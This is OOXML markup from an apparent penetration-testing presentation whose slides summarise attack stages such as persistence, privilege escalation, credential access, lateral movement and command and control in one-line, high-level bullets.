            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Execution: Running the Malicious Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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9936666-6306-B1F6-9947-42C405C64489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Attackers execute their payloads once inside.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Could involve deploying ransomware, malware, or malicious macros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Triggering a harmful Excel macro to run malicious code.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3D7FB62-288C-25D7-3771-5779F75DE30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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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86068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577832-D670-A56F-F943-A2D8715043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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F8BC94-C727-C9ED-75ED-617EDF5B517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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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889ECB70-5F21-31BD-4F35-179AE61EC0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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Persistence: Hiding in Plain Sight</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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FE49712-4680-AB20-325E-0427C16E4DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Attackers ensure they can return later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Methods include creating hidden accounts or installing backdoors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Setting up covert admin accounts that aren’t easily noticed.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28224FC-B103-5D04-8F5E-61031EE39D66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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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2214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2993F9-65F7-A892-259D-5ED4894A6A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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8E67FC-090C-3224-C537-3999C88974C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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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730BDA2C-733D-610A-BB2C-5732AAD341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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Privilege Escalation – Gaining Higher Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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E379747-5D50-179A-5D4A-E7C3D0C45D5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Transitioning from limited access to full control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Often involves exploiting system flaws or misconfigurations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Upgrading a regular user to an admin using a Windows vulnerability.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297B86A-E5A2-F8E5-082C-8517FDBAA7CB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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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3058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D9BE0F-00F8-6F64-EFAC-DE44170728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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C56D680-288E-A583-A42C-5634E786CC3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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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7AF8ACB0-9F4E-4D6A-035E-A0DA647DDA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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Defense Evasion – Staying Under the Radar</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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7C1B616-0B9E-73B7-D4B4-A66288E92446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Techniques used to avoid detection by security systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Actions include deleting logs, obfuscating code, or mimicking normal behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Erasing evidence to bypass endpoint detection.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24225CC-EEDE-D961-DC52-411DBCE39CA7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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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0907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CF4559-D5A9-7922-276D-9CAB9C3F32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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCA643B5-8139-8DE4-1DE1-70A0FA8E35B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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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CADA69EA-3A15-8B21-71BC-7A21E1CFBC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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Credential Access: Grabbing the Keychain</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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190C17B-A9AA-2818-F59D-02D0AF32DED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Focus on stealing usernames, passwords, and tokens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Commonly involves tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Extracting credentials from memory to expand access.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619CCD4-9BB9-4C47-7147-DF856F39662B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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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96990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C37C9D-CBAB-9DB7-0BB6-082EA27416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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C318CDC6-6E59-C83A-0A9A-48ADD87390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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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555AEA40-FD99-A504-F502-3B5F10C98C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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Why Penetration Testing Matters</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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658304CF-E3FB-B205-2805-EE420C5AB9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540935"/>
            <a:ext cx="10515599" cy="4800600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20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🔍 Find &amp; Map Weaknesses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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Your treasure map to fixes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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📊 Risk to Action</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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Turn ‘what if?’ into ‘what’s next?’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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📜 Pass Audits, Earn Trust</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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GDPR? HIPAA? No sweat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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✅ Validate Tools</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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Does your firewall actually work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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💪 Build Team Resilience</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1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Fire drills for cyber warriors.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47CB978-EB3A-8D3A-4FAD-D9BEFC5CA0A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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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6916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10E7EB1-BCB9-E97F-5007-9CD33F2A9E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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D149FB69-5DEE-4DE5-2367-D7FFFE7058B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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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4A2B36F5-C5D2-0EA0-C6C9-B823A88C3E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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Discovery – Mapping the Treasure</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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BA9B6F2-8196-7FA4-3FB2-C2DF91047C15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Attackers explore the network to find valuable assets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>They identify databases, domain controllers, and other critical systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Scanning the network to locate high-value targets.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20AA542-CC96-250B-0E17-4F808C4CA60F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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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866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99B5D1-211F-7B5A-4CB8-C420E7EE80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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A72FC33-A5AA-9912-8983-2C213F3DA5D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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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8DD4C658-3CD0-36C2-AB9A-5086FDC740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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Lateral Movement – Expanding Their Reach</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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0423D46-3255-3387-EDD0-A19878881F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Moving from one system to another within the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Utilizes stolen credentials or exploits trust relationships.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Using compromised login details to access internal servers.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7D6733E-8DB1-AEA2-3713-503FDE43B578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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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8443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02ED692-10A2-2F4C-A3FD-E1BC5B3710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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE06EA9-289B-9797-3B3A-2D94DEC43C1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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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FDC83C02-2566-5F09-33B8-24D882F69F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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Collection: Packing the Loot</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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5BD82D8-12DE-7498-11B2-046721D1EC82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Consolidating and collecting data that has value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>This can include customer records, intellectual property, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Aggregating sensitive files in preparation for exfiltration.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6332DF0-7B71-D1AB-7866-28E8BFB6A061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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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7495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C2311D-868B-4B4C-AD75-38A705CFE5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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E1CEBC-3A33-0315-38BB-D726461E890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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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CC7F5B4B-E763-DA0A-326E-96DAB6CE28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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Command &amp; Control: The Getaway Car</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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B4FA6DC-4B04-FC45-0E92-71DF6178DA6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
